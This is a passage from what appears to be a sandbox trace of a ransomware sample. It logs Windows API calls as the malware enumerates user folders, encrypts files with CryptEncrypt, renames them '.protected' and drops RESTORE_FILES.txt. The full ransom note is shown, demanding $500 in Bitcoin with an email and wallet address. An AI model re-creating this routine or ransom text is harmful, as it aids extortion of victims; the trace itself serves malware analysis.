pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini") returned 77 [0093.836] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0093.836] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0093.836] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.836] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.836] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds 
Cache\\KQMHSVKD\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.837] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini") returned 77 [0093.837] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0093.837] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini") returned 77 [0093.837] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0093.837] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini") returned 77 [0093.837] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0093.837] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0093.838] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.838] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0093.839] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.839] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.839] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.839] CloseHandle (hObject=0x150) returned 1 [0093.839] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini.protected") returned 87 [0093.839] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini.protected")) returned 1 [0093.840] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.840] lstrcmpiW (lpString1="fwlink[1]", lpString2="Windows") returned -1 [0093.840] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files") returned -1 [0093.840] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files (x86)") returned -1 [0093.840] lstrcmpiW (lpString1="fwlink[1]", lpString2="$Recycle.bin") returned 1 [0093.840] lstrcmpiW (lpString1="fwlink[1]", lpString2="System Volume Information") returned -1 [0093.840] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]") returned 75 [0093.840] StrStrIW (lpFirst="fwlink[1]", lpSrch=".protected") returned 0x0 [0093.840] lstrcmpW (lpString1="fwlink[1]", lpString2="RESTORE_FILES.txt") returned -1 [0093.840] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.840] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 
pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.840] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]") returned 75 [0093.840] StrStrW (lpFirst="fwlink[1]", lpSrch=".txt") returned 0x0 [0093.840] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]") returned 75 [0093.840] StrStrW (lpFirst="fwlink[1]", lpSrch=".rar") returned 0x0 [0093.840] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]") returned 75 [0093.840] StrStrW (lpFirst="fwlink[1]", lpSrch=".zip") returned 0x0 [0093.840] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0093.841] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.841] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0093.841] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.841] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: 
lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.841] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.841] CloseHandle (hObject=0x150) returned 1 [0093.842] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1].protected") returned 85 [0093.842] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1]"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1].protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1].protected")) returned 1 [0093.842] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.842] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.842] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\RESTORE_FILES.txt") returned 83 [0093.842] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.844] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.844] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0093.844] lstrlenA (lpString="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") returned 684 [0093.844] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 
[0093.845] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.845] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0093.845] CloseHandle (hObject=0x14c) returned 1 [0093.845] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.845] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.846] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\RESTORE_FILES.txt") returned 74 [0093.846] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0093.846] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.846] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0093.847] lstrlenA (lpString="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") returned 684 [0093.847] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0093.847] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.847] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0093.847] CloseHandle (hObject=0xd8) returned 1 [0093.847] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.848] lstrcmpiW (lpString1="Internet Explorer", lpString2="Windows") returned -1 [0093.848] lstrcmpiW (lpString1="Internet Explorer", lpString2="Program Files") returned -1 [0093.848] lstrcmpiW (lpString1="Internet Explorer", lpString2="Program Files (x86)") returned -1 [0093.848] lstrcmpiW (lpString1="Internet Explorer", lpString2="$Recycle.bin") returned 1 [0093.848] lstrcmpiW (lpString1="Internet Explorer", lpString2="System Volume Information") returned -1 [0093.848] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer") returned 62 [0093.848] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0093.848] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0093.848] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\*") returned 64 [0093.848] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.848] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.848] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.848] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.848] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.848] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.848] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\.") returned 64 [0093.848] lstrcmpW (lpString1=".", lpString2=".") 
returned 0 [0093.851] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.851] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.851] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.851] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.851] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.851] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.851] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\..") returned 65 [0093.851] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.851] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.851] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.851] lstrcmpiW (lpString1="brndlog.bak", lpString2="Windows") returned -1 [0093.851] lstrcmpiW (lpString1="brndlog.bak", lpString2="Program Files") returned -1 [0093.851] lstrcmpiW (lpString1="brndlog.bak", lpString2="Program Files (x86)") returned -1 [0093.851] lstrcmpiW (lpString1="brndlog.bak", lpString2="$Recycle.bin") returned 1 [0093.851] lstrcmpiW (lpString1="brndlog.bak", lpString2="System Volume Information") returned -1 [0093.851] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak") returned 74 [0093.851] StrStrIW (lpFirst="brndlog.bak", lpSrch=".protected") returned 0x0 [0093.851] lstrcmpW (lpString1="brndlog.bak", lpString2="RESTORE_FILES.txt") returned -1 [0093.851] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.851] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, 
dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.851] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.852] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak") returned 74 [0093.852] StrStrW (lpFirst="brndlog.bak", lpSrch=".txt") returned 0x0 [0093.853] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak") returned 74 [0093.853] StrStrW (lpFirst="brndlog.bak", lpSrch=".rar") returned 0x0 [0093.853] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak") returned 74 [0093.853] StrStrW (lpFirst="brndlog.bak", lpSrch=".zip") returned 0x0 [0093.853] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.862] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.862] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.862] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.862] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: 
lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0093.862] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0093.862] CloseHandle (hObject=0x14c) returned 1 [0093.863] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak.protected") returned 84 [0093.863] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak.protected")) returned 1 [0093.863] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.863] lstrcmpiW (lpString1="brndlog.txt", lpString2="Windows") returned -1 [0093.863] lstrcmpiW (lpString1="brndlog.txt", lpString2="Program Files") returned -1 [0093.863] lstrcmpiW (lpString1="brndlog.txt", lpString2="Program Files (x86)") returned -1 [0093.863] lstrcmpiW (lpString1="brndlog.txt", lpString2="$Recycle.bin") returned 1 [0093.863] lstrcmpiW (lpString1="brndlog.txt", lpString2="System Volume Information") returned -1 [0093.863] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt") returned 74 [0093.863] StrStrIW (lpFirst="brndlog.txt", lpSrch=".protected") returned 0x0 [0093.863] lstrcmpW (lpString1="brndlog.txt", lpString2="RESTORE_FILES.txt") returned -1 [0093.863] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, 
pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.863] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.864] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.864] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt") returned 74 [0093.864] StrStrW (lpFirst="brndlog.txt", lpSrch=".txt") returned=".txt" [0093.864] lstrlenW (lpString=".txt") returned 4 [0093.864] lstrlenW (lpString=".txt") returned 4 [0093.864] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.869] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.869] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.869] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x7a9, lpOverlapped=0x0) returned 1 [0093.870] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffff857, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.870] WriteFile (in: 
hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x7a9, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x7a9, lpOverlapped=0x0) returned 1 [0093.870] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.870] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0093.870] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0093.870] CloseHandle (hObject=0x14c) returned 1 [0093.870] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.protected") returned 84 [0093.870] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt.protected")) returned 1 [0093.871] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.871] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.871] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\RESTORE_FILES.txt") returned 80 [0093.871] CreateFileW 
